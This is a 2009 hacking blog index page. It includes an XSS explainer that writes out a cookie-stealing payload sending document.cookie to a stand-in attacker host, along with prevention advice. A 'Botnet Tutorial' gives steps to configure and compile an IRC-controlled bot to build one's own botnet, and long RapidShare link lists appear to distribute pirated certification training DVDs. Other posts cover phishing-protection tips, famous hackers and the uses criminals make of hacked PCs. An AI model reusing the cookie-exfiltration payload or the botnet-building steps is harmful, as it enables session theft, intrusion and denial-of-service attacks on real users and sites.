Showing posts with label Hacking Tools ™. Show all posts
Showing posts with label Hacking Tools ™. Show all posts

Thursday, August 6, 2009

Cross Website Scripting(XSS) Info and Prevention

0 comments

Welcome to the hacking discussion blog

So here I m gonna write an article over XSS aka cross website scripting …………

Some declaration-this article is only meant for educational purpose if someone uses it for wrong purpose then HD blog is not responsible for it .

Note – since HDB will not going to show the codes so I modify then now there is some new parameter which means something else

< = {

> = }

Introduction

Cross Site Scripting aka XSS is one of the most common application level attacks that hackers use to sneak into web applications today. They are unique in that, rather than attacking a server directly, they use a vulnerable server as a vector to attack a client. This can lead to extreme difficulty in tracing attackers, especially when requests are not fully logged Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the XSS attack involves three parties – the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user. This was achieved by running malicious Javascript code at the victim (client) browser, with the “access privileges” of the web site. These are the very limited Javascript privileges which generally do not let the script access anything but site related information. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. The result, the attacker gains the cookies and impersonates the victim.

TYPES OF XSS

LOCAL XSS

This form of XSS is rarely mentioned, because it is very hard to pull off and requires knowledge of either browser exploits or local OS html files. For the first scenario, the attacker could use their website to send malicious commands to the local users vulnerable HTML files(look in /WINDOWS, there are HTML files there) that executes some command on the users system. The second form that this attack can take is using browser exploits. Using a browser exploit, the attacker can plant an activeX script locally on the users system, which can run under local HTML priveleges(all javascripts are allowed without confirmation) and install backdoors, worms, spambots etc.

Non-persistent XSS

This type of XSS attack does no harm to the site itself, and they are created when javascript can be injected into a variable that is echoed back to the user in some way. Say when you enter some text into a search bar and press submits, and the new page that is loaded has what you searched saved in the search bar. You could escape the input tag using “} then inject script, e.g. {script}alert(”war10rd”){/script}. This is only useful in social engineering where you get a user, or administrator, to visit the page with the same parameters you provided to create the XSS, only this time with a cookie stealer script on the page. This will execute for them, logging their cookies to a site you choose

Persistent XSS

This kind of XSS is what is mostly used against guestbooks, forums and other permanent user content pages. When this type of XSS is used it stays on the page and can be used in many ways; stealing cookies, defacing a page, and spreading (the new “XSS worm” phenomenon same as the famous orkut worm)

NOW XSS ATTACK

XSS attacks are the result of flaws in server- side web applications and are rooted in user input which is not properly sanitized for HTML characters. If the attacker can insert arbitrary HTML then they could control execution of the page under permissions of the site. Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them. These links cause client side scripting languages (VBScript, JavaScript, etc.) of the attacker’s choice to execute on the victim’s browser. XSS vulnerabilities are caused by a failure in the web application to properly validate user input. The most common web components that fall victim to XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags (much like the Badtrans worm). There are numerous ways to inject JavaScript code into URLs for the purpose of a XSS attack

Let see one example

{?php echo “Hello, {$HTTP_GET_VARS['name']}!”; ?}

Once the page is accessed, the variable sent via the GET method is placed directly on the rendered page. Since the input is not marked as variable input , the user- supplied input is interpreted exactly as its metacharacters command, very similar to SQL injection. Passing “Hacking discussion” as an argument outputs the content in correct form:

http://hdhost/hello.php?name=hacking%20discussion

now let us call site we use for XSS is called

http://www.xyz.com

At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or path) and echoes it back to the response page, in full or in part, without first sanitizing it i.e. making sure it doesn’t contain Javascript code and/or HTML tags. Suppose, therefore, that this script is named 1.cgi, and its parameter is “name”. It can be operated this way:

GET /1.cgi?name=hacking%20discussion HTTP/1.0

Host: www.xyz.com

And the response would be:

{HTML}

{Title}1!{/Title}

Hi hacking discussion

{BR}

Welcome to our system

{/HTML}

Now explanation

Well, the attacker manages to lure the victim client into clicking a link the attacker supplies to him/her. This is a carefully and maliciously crafted link, which causes the web browser of the victim to access the site ( www.xyz.com ) and invoke the vulnerable script. The data to the script consists of a Javascript that accesses the cookies the client browser has for www.xyz.com . It is allowed, since the client browser “experiences” the Javascript coming from www.xyz.com , and Javascript’s security model allows scripts arriving from a particular site to access cookies belonging to that site.

Such a link looks like:

http://www.xyz.com/1.cgi?name={script}alert(document.cookie){/script}

The victim, upon clicking the link, will generate a request to www.xyz.com , as follows:

GET /1.cgi?name={script}alert(document.cookie){/script} HTTP/1.0

Host: www.xyz.com

And the vulnerable site response would be:

{HTML}

{Title}1!{/Title}

Hi {script}alert(document.cookie){/script}

{BR}

Welcome to our system

{/HTML}

The victim client’s browser would interpret this response as an HTML page containing a piece of

Javascript code. This code, when executed, is allowed to access all cookies belonging to

www.xyz.com, and therefore, it will pop-up a window at the client browser showing all client

cookies belonging to www.xyz.com. Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a web site (www.xyz.com), and use a script to receive the cookies. Instead of popping up a window, the attacker would write a code that accesses a URL at his/her own site (www.xyz.com), invoking the cookie reception script with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.com server. The malicious link would be:

http:// www.xyz.com /1.cgi?name={script}window.open(“http://www.attacker.com/collec

t.cgi?cookie=”%2Bdocument.cookie){/script}

And the response page would look like:

{HTML}

{Title}1!{/Title}

Hi

{script}window.open(“http://www.attacker.com/collect.cgi?cookie=”+document.cookie){

/script}

{BR}

Welcome to our system

{/HTML}

The browser, immediately upon loading this page, would execute the embedded Javascript and would send a request to the collect.cgi script in www.attacker.com, with the value of the cookies of www.xyz.com that the browser already has. This compromises the cookies of www.xyz.com that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached. It should be noted, that causing the Javascript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to a XSS attack. If Javascript’s “alert” function can be called, there’s usually no reason for the “window.open” call not to succeed. That is why most examples for XSS attacks use the alert function, which makes it very easy to detect its success.

Now Security

As a web application user, there are a few ways to protect your self from XSS attacks. The first

and most effective solution is to disable all scripting language support in your browser and email

reader. another thing is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages. Additionally, as a last resort, proxy servers can help filter out malicious scripting in HTML

Web application developers and vendors should ensure that all user input is parsed and filtered properly. User input includes things stored in GET Query strings, POST data, Cookies, URLs, and in general any persistent data that are transmitted between the browser and web server. The best philosophy to follow regarding user input filtering is to deny all but a pre-selected element set of benign characters in the web input stream. This prevents developers from having to constantly predict and update all forms of malicious input in order to deny only specific characters (such as < ; ? etc.).

Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities since application functionality is constantly changing due to upgrades, integration of third party technologies, and decentralized website authoring. Many vulnerability web application scanners are now starting to include checks for XSS, although it is unlikely that any current automated will be truly comprehensive.

By installing a third party application firewall, which intercepts CSS attacks before they reach the web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods (including path and HTTP headers) in a generic way, regardless of the script/path from the in-house application, a third party script, or a script describing no resource at all (e.g. designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and Javascript patterns, and if any match, the request is rejected and the malicious input does not arrive to the server.

References –

Cross Site Scripting Explained by Amit Klein, Sanctum Security Group

Types of xss attack by cybern00b

The Evolution of Cross-Site Scripting Attacks By David Endler

The Anatomy of Cross Site Scripting by Gavin Zuchlinski

CREDITS:- http://www.hackingdiscussion.com

Six ways to protect your gmail account from being cracked

0 comments

What is phishing?

Phishing is the best working method of hacking email accounts. The advantage of phishing in email account hacking is that victim is not able to recognize the fake page (phisher) as this phisher matches with the original page (depends on cracker’s skills).

So, here I have mentioned few tips which you should follow to prevent cracking of your email account by crackers.

1. Phishing filter:
I will recommend use of browser which has phishing filter.Web browsers like Firefox 3.0+ (my favorite), Internet Explorer 7+, Opera 7x supports phishing filter and should be used for safe browsing.

2. Do not provide sensitive information :
Yes, this is the main thing you have to remember. Unless and until, you know the person or institute, do not give your sensitive information like user ids , passwords, bank account numbers as a reply to any email. In fact, 90% emails demanding such information are meant for cracking!

3. Suspicious Filters :
Check whether there are any suspicious filters not created by you. For checking your email filters, go to Settings->Filters. If you find any such suspicious filter not created by you, delete it urgently.

4. Great offers, ads, winners :
Generally, Gmail users are deceived by emails which contain great offers, ads or declaring that you are a lucky winner and you should provide listed query information to receive your cash prize. Never click or provide any information for such claiming emails, unless you’ve actually participated in any of the said competitions, chances are that, you never had!

5. Disable Forwarding and POP/IMAP :
To disable forwarding and POP/IMAP, go to Settings-> Forwarding and POP/IMAP and disable forwarding and POP/IMAP.

6. The most important :
The most important precaution which one must follow is “do not click on the link” provided in the email without knowing to which page the link will take you. I have added my personal experience of phishing and the method to determine the link target, where i received a paypal phisher, in my article Paypal phisher to crack Paypal account. One more thing, always open link given in email by typing address of site in new tab/window.

Thus, if you will follow these guidelines, i bet your Gmail account will never be cracked by a phisher. Just remember the guidelines and prevent Gmail account from being cracked by crackers.

source: This isn’t my original article, but an aggregate information I’ve gathered in time, which will hopefully help you.


CREDITS:- http://www.hackingdiscussion.com

Monday, August 3, 2009

List Of Worlds Best hackers

0 comments
Hackers, a group that consists of skilled computer enthusiasts. A black hat is a person who compromises the security of a computer system without permission from an authorized party, typically with malicious intent. The term white hat is used for a person who is ethically opposed to the abuse of computer systems, but is frequently no less skilled. The term cracker was coined by Richard Stallman to provide an alternative to using the existing word hacker for this meaning.The somewhat similar activity of defeating copy prevention devices in software which may or may not be legal in a country's laws is actually software cracking....


List of Famous Hackers of All Time:




There are numbers of Hackers in the world till date, Few has become famous by their Black hat work and few of them are famous by their Ethical Hacking. Below is separate list of World's All Time Best Hackers and Crackers. Although I represent them by Hackers only because what every they did, was wrong but one thing is sure they were Brilliant. Hacking is not a work of simple mind, only Intelligent Mind can do that.


Gary McKinnon

Gary McKinnon, 40, accused of mounting the largest ever hack of United States government computer networks -- including Army, Air Force, Navy and NASA systems The court has recommended that McKinnon be extradited to the United States to face charges of illegally accessing 97 computers, causing US$700,000 (400,000 pounds; euro 588,000) in damage.


Jonathan James

The youth, known as "cOmrade" on the Internet, pleaded guilty to intercepting 3,300 email messages at one of the Defense Department's most sensitive operations and stealing data from 13 NASA computers, including some devoted to the new International Space Station. James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive e-mails and capture employee usernames and passwords.James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost.


Adrian Lamo

Dubbed the “homeless hacker,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. In a profile article, “He Hacks by Day, Squats by Night,” Lamo reflects, “I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional.”Dubbed the “homeless hacker,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.

Kevin Mitnick

The Department of Justice describes him as “the most wanted computer criminal in United States history.” His exploits were detailed in two movies: Freedom Downtime and Takedown. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation’s computer network and stealing software.Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.


Kevin Poulsen

Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio’s KIIS-FM phone lines, (taing over all of the station’s phone lines) which earned him a brand new Porsche, among other items. Law enforcement dubbed him “the Hannibal Lecter of computer crime.”Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.His hacking specialty, however, revolved around telephones. Poulsen’s most famous hack, In a related feat, Poulsen also “reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency.” Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.


Robert Tappan Morris

Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.

Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years’ probation, 400 hours of community service and a fined $10,500.Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.


Vladimir Levin


Levin accessed the accounts of several large corporate customers of Citibank via their dial-up wire transfer service (Financial Institutions Citibank Cash Manager) and transferred funds to accounts set up by accomplices in Finland, the United States, the Netherlands, Germany and Israel.In 2005 an alleged member of the former St. Petersburg hacker group, claiming to be one of the original Citibank penetrators, published under the name ArkanoiD a memorandum on popular Provider.net.ru website dedicated to telecom market.According to him, Levin was not actually a scientist (mathematician, biologist or the like) but a kind of ordinary system administrator who managed to get hands on the ready data about how to penetrate in Citibank machines and then exploit them.ArkanoiD emphasized all the communications were carried over X.25 network and the Internet was not involved. ArkanoiD’s group in 1994 found out Citibank systems were unprotected and it spent several weeks examining the structure of the bank’s USA-based networks remotely. Members of the group played around with systems’ tools (e.g. were installing and running games) and were unnoticed by the bank’s staff. Penetrators did not plan to conduct a robbery for their personal safety and stopped their activities at some time. Someone of them later handed over the crucial access data to Levin (reportedly for the stated $100).


David Smith

David Smith, the author of the e-mail virus known as Melissa, which swamped computers around the world, spreading like a malicious chain letter. He was facing nearly 40 years in jail . About 63,000 viruses have rolled through the Internet, causing an estimated $65 billion in damage, but Smith is the only person to go to federal prison in the United States for sending one.


Mark Abene

Abene (born 1972), better known by his pseudonym Phiber Optik, is a computer security hacker from New York City. Phiber Optik was once a member of the Hacker Groups Legion of Doom and Masters of Deception. In 1994, he served a one-year prison sentence for conspiracy and unauthorized access to computer and telephone systems.

Phiber Optik was a high-profile hacker in the early 1990s, appearing in The New York Times, Harper’s, Esquire, in debates and on television. Phiber Optik is an important figure in the 1995 non-fiction book Masters of Deception — The Gang that Ruled Cyberspace


Onel A. de Guzman

el A. de Guzman, a Filipino computer student, Greatest Hacker of all time. He was creator of "Love Bug" virus that crippled computer e-mail systems worldwide.

Chen Ing-hau

He was the creator of one of the deadly virus of all time "Chernobyl computer virus " which had melted down many computers worldwide.





Mudge

"Mudge" along with fellow hackers told the committee that computer security is so lax, they could disable the entire Internet in a half-hour.



Tsutomu Shimomura

One of the world's top computer security experts. Shimomura helped Federal officials track down and arrest computer hacker Kevin Mitnickin Raleigh Feb. 15, 1995 in connection with a break-in on Shimomura's computer.





Jon Lech Johansen

Johansen, who became a hero to computer hackers and was deemed a villain by Hollywood, is on trial for writing and distributing a program called DeCSS, software which makes it possible to copy protected DVD films. Prosecutors have asked to have his computers confiscated and called for him to pay $1,400 in court costs.



Dmitry Sklyarov

Russian computer programmer who was charged with violating copyrights, Sklyarov was jailed after developing software that allows the user to circumvent the copyright protections in Adobe Systems eBook reader program.


Dennis Moran

Moran, known on the Web as "Coolio," pleaded guilty to hacking into national computer sites last year belonging to the Army, the Air Force and the anti-drug Dare.com.








Famous Three Master Hackers




Some Grand Famous Hackers of Life Time:

Richard Stallman

He was the founder of GNU Projects. Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.


Linus Torvalds

Father of Linux is a good hacker of all time.












Stephen Wozniak

"Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger.









Some Other famous Hackers :

Dennis Ritchie and Ken Thompson
John Draper
Johan Helsingius
Eric Steven Raymond
Ian Murphy
John Perry Barlow
Tim Berner Lee

Saturday, July 25, 2009

Hacking sites for learners

0 comments

Well well well..As I already told you,most of people ask me how to become a hacker,and my usual reply is that I cant make you a hacker,but I can tell you how to Phrack..The ultimate hackers zine be one,and its your interest,your passion,your mindset which will drive you to be one.A hacker evolves from many stages,from the lower level script kiddie to the elite level Guru,one needs to be in constant research to develop their soft and hard skills.I m myself learning a lot,and I would like to share 5 Hacking sites,which you must visit,if you want to be an expert in security.

Phrack

Phrack is the granddaddy of all the hacking sites out there,and is the world’s oldest hacker ezine,by hackers,for hacker. Described by Gordon Fyodor as "the best, and by far the longest running hacker zine” covers deep articles on Hacking and Cracking.A heaven for willing learners,Its articles are worth in gold.

Hacki9

Hakin9 offers an in-depth look at both attack and defense techniques and concentrates on difficult technical issues.Hakin9's target readers are those responsible for IT system security, programmers, security specialists, professional administrators, as well as people taking up security issues in their free time.

Milw0rm

When it comes to getting exploits,few sites are as comprehensive and updated as Milw0rm.Milw0rm provides a one stop platform for almost all security experts along the world to publish their new found exploits on the web so that other can study them for good or worse.

Hack this Site

Wanna test your hacking skills ? Hack This Site puts your skills to an ultimate test as it throws you real life challenges of almost every type,Trust me,If you have it in you,visit and complete its missions and nothing can beat you.

2600

A great collection of articles and podcasts on security,one has to visit 2600 to get a feel what hacking is.

I believe you will get better and learn something..

Keep Learning

Sunday, July 19, 2009

My PC Hacked! huh...I don't keep anything important for him to take

0 comments
Hi Home User,

I don't do Netbanking, shopping using Credit cards, don't store anything important in my home PC, then why would a cracker hack my PC?

You too, like most of home users, might have the same perception.

Now let me show you how dangerous your "hacked pc" could become, for you and for others, after it has been hacked.

See the picture carefully:



So in nutshell your PC could be used as a "Launching Pad" to further launch attacks.
Just imagine if some cracker try to hack into Indian Army Computers through your computer, offcourse your IP Address would be logged there and cops would be knocking your doors!!!

The graphic above shows the different reasons criminals may want access to your system. Author has explained each category in more detail below:

Illicit Web Hosting

Cyber criminals commonly use hacked PCs as a host for a variety of dodgy Web hosting schemes, including:

- Spam Web sites

- Phishing Web sites

- Malware download sites

- "Warez" servers, or hosts for pirated software and movies.

- Child pornography servers

Zombie Grunt Work

Infected PCs also frequently are turned into zombies designed to carry out all sorts of monotonous, repetitive tasks for cyber crooks, such as:

- Relaying junk e-mail

- Participating in so-called denial-of-service attacks designed to extort money from Web sites by pelting them with massive amounts of bogus Web traffic if they refuse to pay protection money;

- Engaging in "click fraud," which uses zombies to gin up fake mouse clicks for networks of phony Web sites that siphon money from advertisers.

- Serving as a proxy through which bad guys route their Web traffic.

- Providing computational power that criminals use to help solve CAPTCHA challenges, the squiggly lines of numbers and letters many free Web mail services require you to solve - designed to tell humans apart from zombies.

E-Mail/Webmail Attacks

An infected PC potentially has great value to spammers and attackers beyond simply acting as a relay for junk e-mail. For example, compromised systems typically are harvested for e-mail addresses that will be sold and used in future phishing and spam attacks.

An attacker doesn't need to compromise an Internet user's computer to wreak havoc with their identity and online life. A compromised Webmail account, for example, can yield a bounty of useful information because many people often will use the same e-mail address and password for multiple services. (Even if the victim uses different passwords at each service, usually those passwords can be reset as long as the attacker has access to the victim's inbox).

Hacked Webmail accounts also frequently are used to scam the victim's friends. Sometimes, crooks will use a hijacked Webmail account to blast out tailored spam to all of the victim's contacts, usually recommending some no-name, bargain basement e-commerce site that is set up merely to steal credit and debit card information.

Another long-running scam involving hacked Webmail accounts goes like this: Scammers blast out a note to all of the victim's contacts, claiming that the victim has become stranded in some foreign country and desperately needs friends and family to wire money.

Account Credentials

Any stored credentials -- particularly user names and passwords for online services - are fair game on hacked PCs. Stolen eBay credentials often are used to abuse the victim's good reputation and used to list non-existent or stolen items for auction. Compromised Paypal records can aid in these bogus auctions as well, or drained of its funds. Credentials for voice-over-IP or Internet-based telephone services like Skype also are a hot item on underground cyber criminal forums, because they can be used to mask the caller's location and aid in a variety of scams.

Credentials that victims use to administer Web sites -- even social networking site Web pages -- can be of huge value to cyber crooks. A number of automated threats will scrape credentials that victims use to transfer files to and from any personal or professional Web sites they may administer. Stolen file transfer protocol (FTP) credentials, for example, give attackers control over the victim's site, which is often then use to host malicious programs or other illicit content that helps further a variety of online criminal schemes.

Finally, credentials that allow access to the network of the victim's employer or company can be of great interest to digital thieves. In many corporate environments, employees cannot log in remotely without having a special, password protected encryption certificate saved on their computer. Some families of malicious software -- including the Sinowal or Torpig Trojan -- will try to steal these certs from infected systems.

Virtual Goods

Virtual goods, those that have seemingly intangible value, are among the most sought-after commodities in the general hacking scene. Entire families of malware exist to harvest license keys for thousands of computer games and steal credentials that gain access to online games in which a player's worth is determined largely by the amount of virtual goods his or her character has amassed. There is a mature, multi-billion dollar market for these accounts, and the goods themselves, at least some of which is stolen from compromised PCs.

Financial Credentials

When casual Internet users think about the value of their PC to cyber crooks, they typically think stolen credit card numbers and online banking passwords. But as we have seen, those credentials are but one potential area of interest for attackers.

This is by no means an exhaustive list.

I hope this information will let you realize how dangerous your "scrap" PC could become if hacked by crackers.
Secure your PC's

Friday, July 3, 2009

Botnet Tutorial

0 comments
Botnet's History

Botnets have been in existence for about 10 years; experts have been warning the public about the threat posed by botnets for more or less the same period. Nevertheless, the scale of the problem caused by botnets is still underrated and many users have little understanding of the real threat posed by zombie networks (that is, until their ISP disconnects them from the Internet, or money is stolen from their credit cards, or their email or IM account is hijacked).

What Is A Botnet?

A botnet is a number of Internet computers that, although their owners are unaware of it, have been set up to forward transmissions to other computers on the Internet. A usually gains control by infecting the computers with a virus or other malicious code that gives the attacker access. The main problem with botnets is that they are hidden and may stay undetected unless you are specifically looking for certain activity.

These Armies of computer's can be used by the controller to take down a network or site by using a attack called DOS(Denial of service) In which a user attempt's to make it unavailable to its intended users. This is because it requests info to be sent to their computer so many times it kills the bandwidth and can shut down a site for some time.

[align=center][/align]

Making Your Own Botnet

For this tutorial ill be using uNkbot.

Follow these steps to make the botnet:

1)Open the botnet in C++ and go on the config.h file.



2)Edit The Following

Edit the Following Underlined Stuff:

server:The irc server where your botnet is hosted.
pass:Your bots password(You will need this to use your bots).
mainchan:The botnet channel.
key:You probably wont need this but put 1 anyways.

Then the down part should be:

[code]{ "server","",6667,"#mainchan","","+ix","+ix",},[/code]

3)Compile The Bot

Now when you finished this you must set up the compiler.

Install Microsoft SDK

Go To: Tools>Options>Directories and set them like this:



Then right-click "uNkbot Files" and click "Build".



It should compile with no errors and your .exe should be in the "Debug" folder.

Tutorial Made By Darlixus

Thursday, July 2, 2009

Certified Ethical Hacker - CEH v6 Training DVD [4 DVDs]

0 comments
Certified Ethical Hacker - CEH v6 Training DVD [4 DVDs]

Image

Code:

DVD1
http://rapidshare.com/files/250213810/CEH6_Vol1.part01.rar
http://rapidshare.com/files/250213940/CEH6_Vol1.part02.rar
http://rapidshare.com/files/250213589/CEH6_Vol1.part03.rar
http://rapidshare.com/files/250213624/CEH6_Vol1.part04.rar
http://rapidshare.com/files/250213731/CEH6_Vol1.part05.rar
http://rapidshare.com/files/250213942/CEH6_Vol1.part06.rar
http://rapidshare.com/files/250214040/CEH6_Vol1.part07.rar
http://rapidshare.com/files/250213376/CEH6_Vol1.part08.rar
http://rapidshare.com/files/250213915/CEH6_Vol1.part09.rar
http://rapidshare.com/files/250214110/CEH6_Vol1.part10.rar
http://rapidshare.com/files/250214302/CEH6_Vol1.part11.rar
http://rapidshare.com/files/250213537/CEH6_Vol1.part12.rar
http://rapidshare.com/files/250213519/CEH6_Vol1.part13.rar
http://rapidshare.com/files/250213440/CEH6_Vol1.part14.rar
http://rapidshare.com/files/250214083/CEH6_Vol1.part15.rar
http://rapidshare.com/files/250213861/CEH6_Vol1.part16.rar
http://rapidshare.com/files/250213314/CEH6_Vol1.part17.rar
http://rapidshare.com/files/250213700/CEH6_Vol1.part18.rar
http://rapidshare.com/files/250214032/CEH6_Vol1.part19.rar
http://rapidshare.com/files/250213870/CEH6_Vol1.part20.rar
http://rapidshare.com/files/250213714/CEH6_Vol1.part21.rar
http://rapidshare.com/files/250214174/CEH6_Vol1.part22.rar
http://rapidshare.com/files/250213399/CEH6_Vol1.part23.rar
http://rapidshare.com/files/250213986/CEH6_Vol1.part24.rar
http://rapidshare.com/files/250213430/CEH6_Vol1.part25.rar
http://rapidshare.com/files/250213961/CEH6_Vol1.part26.rar
http://rapidshare.com/files/250214393/CEH6_Vol1.part27.rar
http://rapidshare.com/files/250213827/CEH6_Vol1.part28.rar
http://rapidshare.com/files/250213959/CEH6_Vol1.part29.rar
http://rapidshare.com/files/250214049/CEH6_Vol1.part30.rar
http://rapidshare.com/files/250225912/CEH6_Vol1.part31.rar
http://rapidshare.com/files/250225621/CEH6_Vol1.part32.rar
http://rapidshare.com/files/250225707/CEH6_Vol1.part33.rar
http://rapidshare.com/files/250225653/CEH6_Vol1.part34.rar
http://rapidshare.com/files/250225256/CEH6_Vol1.part35.rar
http://rapidshare.com/files/250225823/CEH6_Vol1.part36.rar
http://rapidshare.com/files/250225717/CEH6_Vol1.part37.rar
http://rapidshare.com/files/250225549/CEH6_Vol1.part38.rar
http://rapidshare.com/files/250225982/CEH6_Vol1.part39.rar
http://rapidshare.com/files/250224944/CEH6_Vol1.part40.rar


Code:

DVD2
http://rapidshare.com/files/250225335/CEH6_Vol2.part01.rar
http://rapidshare.com/files/250225316/CEH6_Vol2.part02.rar
http://rapidshare.com/files/250225447/CEH6_Vol2.part03.rar
http://rapidshare.com/files/250225833/CEH6_Vol2.part04.rar
http://rapidshare.com/files/250225194/CEH6_Vol2.part05.rar
http://rapidshare.com/files/250225998/CEH6_Vol2.part06.rar
http://rapidshare.com/files/250225604/CEH6_Vol2.part07.rar
http://rapidshare.com/files/250226197/CEH6_Vol2.part08.rar
http://rapidshare.com/files/250225122/CEH6_Vol2.part09.rar
http://rapidshare.com/files/250225424/CEH6_Vol2.part10.rar
http://rapidshare.com/files/250225541/CEH6_Vol2.part11.rar
http://rapidshare.com/files/250225936/CEH6_Vol2.part12.rar
http://rapidshare.com/files/250225785/CEH6_Vol2.part13.rar
http://rapidshare.com/files/250225587/CEH6_Vol2.part14.rar
http://rapidshare.com/files/250225578/CEH6_Vol2.part15.rar
http://rapidshare.com/files/250225539/CEH6_Vol2.part16.rar
http://rapidshare.com/files/250225100/CEH6_Vol2.part17.rar
http://rapidshare.com/files/250225760/CEH6_Vol2.part18.rar
http://rapidshare.com/files/250226219/CEH6_Vol2.part19.rar
http://rapidshare.com/files/250225576/CEH6_Vol2.part20.rar
http://rapidshare.com/files/250227700/CEH6_Vol2.part21.rar
http://rapidshare.com/files/250227832/CEH6_Vol2.part22.rar
http://rapidshare.com/files/250227735/CEH6_Vol2.part23.rar
http://rapidshare.com/files/250227474/CEH6_Vol2.part24.rar
http://rapidshare.com/files/250227893/CEH6_Vol2.part25.rar
http://rapidshare.com/files/250227802/CEH6_Vol2.part26.rar
http://rapidshare.com/files/250227543/CEH6_Vol2.part27.rar
http://rapidshare.com/files/250227847/CEH6_Vol2.part28.rar
http://rapidshare.com/files/250227672/CEH6_Vol2.part29.rar
http://rapidshare.com/files/250227872/CEH6_Vol2.part30.rar
http://rapidshare.com/files/250227811/CEH6_Vol2.part31.rar
http://rapidshare.com/files/250227353/CEH6_Vol2.part32.rar
http://rapidshare.com/files/250227864/CEH6_Vol2.part33.rar
http://rapidshare.com/files/250227494/CEH6_Vol2.part34.rar
http://rapidshare.com/files/250227688/CEH6_Vol2.part35.rar
http://rapidshare.com/files/250227357/CEH6_Vol2.part36.rar


Code:

DVD3
http://rapidshare.com/files/250232916/CEH6_Vol3.part01.rar
http://rapidshare.com/files/250232760/CEH6_Vol3.part02.rar
http://rapidshare.com/files/250233175/CEH6_Vol3.part03.rar
http://rapidshare.com/files/250232867/CEH6_Vol3.part04.rar
http://rapidshare.com/files/250232999/CEH6_Vol3.part05.rar
http://rapidshare.com/files/250233145/CEH6_Vol3.part06.rar
http://rapidshare.com/files/250232530/CEH6_Vol3.part07.rar
http://rapidshare.com/files/250233023/CEH6_Vol3.part08.rar
http://rapidshare.com/files/250232262/CEH6_Vol3.part09.rar
http://rapidshare.com/files/250233083/CEH6_Vol3.part10.rar
http://rapidshare.com/files/250232480/CEH6_Vol3.part11.rar
http://rapidshare.com/files/250232789/CEH6_Vol3.part12.rar
http://rapidshare.com/files/250233002/CEH6_Vol3.part13.rar
http://rapidshare.com/files/250232976/CEH6_Vol3.part14.rar
http://rapidshare.com/files/250232544/CEH6_Vol3.part15.rar
http://rapidshare.com/files/250232919/CEH6_Vol3.part16.rar
http://rapidshare.com/files/250232868/CEH6_Vol3.part17.rar
http://rapidshare.com/files/250233517/CEH6_Vol3.part18.rar
http://rapidshare.com/files/250232994/CEH6_Vol3.part19.rar
http://rapidshare.com/files/250233035/CEH6_Vol3.part20.rar
http://rapidshare.com/files/250239236/CEH6_Vol3.part21.rar
http://rapidshare.com/files/250239204/CEH6_Vol3.part22.rar
http://rapidshare.com/files/250238957/CEH6_Vol3.part23.rar
